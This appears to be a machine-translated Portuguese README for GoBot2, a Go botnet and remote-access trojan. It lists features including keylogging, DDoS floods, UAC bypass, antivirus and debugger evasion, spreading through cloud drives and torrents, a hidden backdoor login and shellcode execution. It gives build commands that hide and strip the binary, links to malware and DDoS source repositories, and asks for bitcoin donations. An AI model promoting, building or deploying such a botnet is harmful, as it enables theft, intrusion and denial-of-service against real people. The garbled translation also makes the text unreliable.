Novo projeto: https://github.com/saturnsvoid/project-whis
GOBOT2
Depois de ver outros usuários se basearem no botnet, eu queria fazer mais trabalho no meu Gobot, mas acabei construindo algo um pouco mais. Há problemas com isso, mas é mais um POC avançado ... Eu não sou um bom codificador, mas consegui fazer isso comprar uma leitura básica online. Havia mais que eu queria fazer com este projeto, mas parei, estou saindo de fazer malware e vírus ... Vou passar para coisas mais legitimetes. Embora eu esteja postando alguns dos meus projetos antigos no meu github, e a maioria das bruxas é malévola, estou colocando -os aqui para simplificar para os 'mocinhos' lutar com eles e lá parentes.
Recursos C&C:
- Escrito em go
- Plataforma cruzada
- Banco de dados SQL para obter informações
- Sistema de login seguro
- Sistema de login codificado
- Simples de usar HTML & CSS C&C
- C&C baseado em console
- Segurança apertada (sem php!)
- Dados codificados e ofuscados
- Https ou http
- Solteiro, selecionado, todos comando emitindo
- Detecção de agente de usuário
- Mais
Recursos de bot
- Manuseio de erro seguro
- Têm painéis ilimitados
- Codificação e ofuscação
- Use https ou http
- Manuseio de comando antigo (> 24 horas) (não execute comandos antigos!)
- Run PowerShell Scripts (via URL, parâmetros aceitos)
- Avançada Torrent Seeder (UTorrent, BitTorrent Auto Download do cliente e é oculto, se necessário)
- Drive Spreader (com lista de nomes)
- Dropbox Spreader (com lista de nomes)
- Spread do Google Drive (com lista de nomes)
- OneDrive Spreader (com lista de nomes)
- Avançado KeyLogger (lida com todas as chaves, títulos de janelas, encaixeia, automóvel, +mais)
- Informações do sistema (IP, Wi -Fi, Usuário, AV, Ipconfig, CPU, GPU, Sysinfo, Software instalado, .NET Framework, Refresher)
- Captura de tela (compressão, captura cronometrada, +mais)
- Baixe e execute (MD5 Hash Check, URL ou Base64, Parâmetros, desvio UAC, removedor de zona)
- Métodos DDOS (intervalo roscado /w, httpget, tcpflood, udpflood, Slowloris, hulk, tlsflood, dreno de largura de banda, Goldeneye, ás)
- Atualização de bot (verificação de hash md5, administrador, removedor de zona)
- UPNP (portas abertas TCP/UDP)
- Servidor da Web (porta 80 de atualização automática, adicione/editar páginas ilimitadas)
- Adicione programas ao Windows Firewall
- Editor de arquivos host (backup e restauração, substitua na corrida, DNS Flusher)
- CMD remoto
- Detectar direitos de administrador
- Geração de identificação de bot (nunca o mesmo)
- Bypass avançado antivírus (alocação de memória aleatória, func hop, atrasos, dlls de carga de tempo de execução /w Obf, tempos de conexão aleatórios, + mais)
- Anti-debug avançado (ISDEBUGGERSPRESS, PROC Detecção, Detecção da Organização de PI, detecção de nomes de arquivos, sistema de reação)
- Sistema de instância única
- Proxy http reverso (porta conf., Servidores de back -end)
- Defesa ativa (defesa do Registro Ativo, Defesa de Arquivos Ativos, Watchdog Active + More) não quer ser morto.
- UAC Bypass (Trabalhe todas as versões e versão atual do Windows 10 Pro 64bit)
- Sistema de instalação avançado (chaves de registro dinâmico, nomes de arquivos dinâmicos, reter direitos de administrador, segmentação por campanha (instalação apenas no país permitido), removedor de zona, adiciona -se ao firewall)
- Desinstalar o sistema (remove todos os traços)
- Escritor (lote, html, vbs, ps)
- Execute shellcode (ThreadExecute)
- Opções de energia (desligamento, reinicialização, logoff)
- Mensagem de erro de inicialização
- MessageBox (Retorna Responder)
- Site aberto (visível/oculto)
- Altere a página inicial
- Alterar plano de fundo (URL ou base64)
- Executar .exe (UAC Bypass Optimal)
- Mate -se
- Verifique se o Proc está funcionando
- Ocultar processo /modo ativo
- Desativar/Ativar (TaskManger, Rededit, Prompt de comando)
- Conta -gotas de arquivo (Coloque a eVenence no PC sem traços de onde veio da seleção /WIR)
Algumas informações sobre o C&C
O C&C é um programa, você pode compilá -lo para sistemas Windows, Linux e Mac. É um servidor da Web que lida com todas as conexões na porta selecionada nas configurações. Ele servirá o HTLM C&C a um conector, se você permitir e salvar dados sobre conta, bots e comandos como um banco de dados SQL e arquivos de bots (capturas de tela, keylogs, ect) como arquivo sob o próprio "perfil" do próprio "perfil"
Você pode controlar o botnet do programa (mais seguro) ou controlá -lo a partir do HTML C&C. O programa da C&C é extremamente estável, os servidores baseados em GO são conhecidos por lidar com milhões ou solicitações de uma só vez sem falhar, apenas verifique se você tem uma boa conexão.
O C&C possui uma construção no login codificado (como uma backdoor) que você pode usar se 'esqueceu' o login da conta. O C&C pode ter qualquer número de contas.
Sendo um programa independente, isso remove a questão dos ataques do SQLI ao C&C, para que seja mais seguro.
O C&C também pode ser executado dentro de um serviço oculto do Tor, se configurado à direita e o cliente (bot) pode se conectar a ele usando uma cebola.to ou ceion.cab forwarder, se necessário. O TOR também pode ser usado pelo bot por meio de um proxy de meias ... simples de fazer, pesquise no Google.
Como construir e usar
As configurações de bot estão localizadas em "Variáveis.GO", a configuração do servidor está localizada em "Server.go"
Compile Gobot.Go com configurações corretas, faça um banco de dados MySQL e importe o arquivo DB, compile Server.Ger com configurações corretas
- vá construir -o gobot.exe -ldflags "-h windowsgui" "c: gobot2 gobot.go"
- vá construir -0 server.exe "c: gobot2 console server server.go"
Sempre compile com '-w -s' ldflags para retirar qualquer informação de depuração do binário.
Ferramentas incluídas
- Ferramenta para o projeto (OBFUSCATOR (CHAR+1) e outra porcaria com fonte em vb.net)
- Downloader.go (download de Golang e Exemplo de Run)
- Downloaderwithuac.go (download de Golang e execute um exemplo com o desvio UAC)
Ofuscador
Não é realmente um ofuscador tudo o que move o char +1 para e a = b, c = d, etc. Simples, mas desacelerará as pessoas querendo mexer com o programa e também programas que pesquisam palavras -chave ...
Pacotes usados
- github.com/nebulouslabs/go upnp
- golang.org/x/sys/windows/registry
- github.com/allendang/w32
- github.com/atotto/clipboard
- github.com/stackexchange/wmi
Imagens
- http://prnt.sc/d67nh5
- http://prnt.sc/d67ogh
- http://prnt.sc/d67oqh
- http://prnt.sc/d6esj3
Créditos e outras coisas
- https://github.com/decred/gominer
- https://github.com/robvanmieghem/gominer
- https://astaxie.gitbooks.io/build-web-application-with-golang/content/en/04.5.html
- http://www.adlice.com/runpe-hide-code-behind-legit-process/
- http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwrwreexe-and-registry-hijacking/
- https://mholt.github.io/json-to-go/
- https://sentinelone.com/blogs/anti-vm-tricks/
- http://hackforums.net/showthread.php?tid=5383448
- https://github.com/grafov/hulk
- https://github.com/nhooyr/dos
- https://github.com/marcelki/sockstress
- https://github.com/ammario/Ssynflood
- https://github.com/matishsiao/goinfo/blob/master/goinfo_windows.go
- https://github.com/iamacarpet/go-win64api
- https://github.com/oneumyvakin/initme/blob/master/windows.go
- https://github.com/lolsquad/ddos-scripts
- https://github.com/vbooter/ddos-scripts
- https://github.com/natefinch/pie
- https://www.windows-commandline.com/enable-remote-desktop-command-line/
- https://www.socketloop.com/tutorials/golang-secure-tls-connection-between-sever-and-client
- https://github.com/lextoumbourou/goodhosts
- https://github.com/yinandyangsecuritywieness/dreamr-botnet
- https://github.com/mauri870/ransomware
- http://www.devdungeon.com/content/making-tor-http-requests-go
- http://www.darul.io/post/2015-07-22_go-lang-simple-reverse-proxy
- https://github.com/mauri870/powershell-reverse-http
- https://github.com/gh0std4ncer/lizkebab/blob/master/client.c
- https://github.com/egebalci/egesploit
- https://github.com/egebalci/hercules
- https://github.com/andrewaeva/gobotnet
- https://github.com/saturnsvoid/goBot
- https://github.com/petercunha/goat
- https://github.com/huin/goupnp
- https://github.com/ytisf/thezoo/tree/master/malwares/source/original
- https://github.com/malwares/remote-access-trojan
- https://github.com/kardianos/service
- https://github.com/vova616/screenshot/blob/master/screenshot_windows.go
- http://hackforums.net/showthread.php?tid=5040543
- http://www.calhoun.io/5-useful-ways-use-use closures-in-go/
- https://blogs.technet.microsoft.com/ilikesql_by_dandyman/2013/03/10/how-to-install-a-msi-file-unattended/
- https://github.com/tadzik/simpleaes
- https://guitmz.com/win32-liora-b/
- https://github.com/rk/go-cron
- https://brawenmalware.com/vulnerabilities/elastic-boutaries-levating-privileges-by-uriramborambons-mvariables-expansion/
- https://brawenmalware.com/malware/ardbot--malware-under-construction/
- https://brawenmalware.com/malware/furtim-malware-avoids-sass-infection/
- https://www.pugetsystems.com/labs/support-software/how-disable-sleep-mode-or-or-hibernation-793/
- https://files.sans.org/summit/digital_forensics_and_incident_Response_summit_2015/pdfs/theressomethingoutwmidevonkerr.pdf
- https://github.com/jasonlvhit/gocron
Outro
GO é uma linguagem de programação incrível e poderosa. Se você já não o fez, confira; https://golang.org/
Doações
Doe para bitcoin Endereço: 1eBr1utjayu3sgtbkzcljmrr5rs7bp7ee
Notícias
Acabei de ler um artigo sobre Bleeping Computer, https://www.bleepingcomputer.com/news/security/backdoored-torrents-infect-movie-tv-fans-with-gobot2-malware/ parece que alguém encontrou um uso para este projeto ... Não tenho nenhum envolvimento com esse grupo ou pessoa. Não tenho mais nada a dizer sobre esse assunto.
-Crab Crab
---------- Log de atualização ---------------------
15/03/2017: Upload Intial ...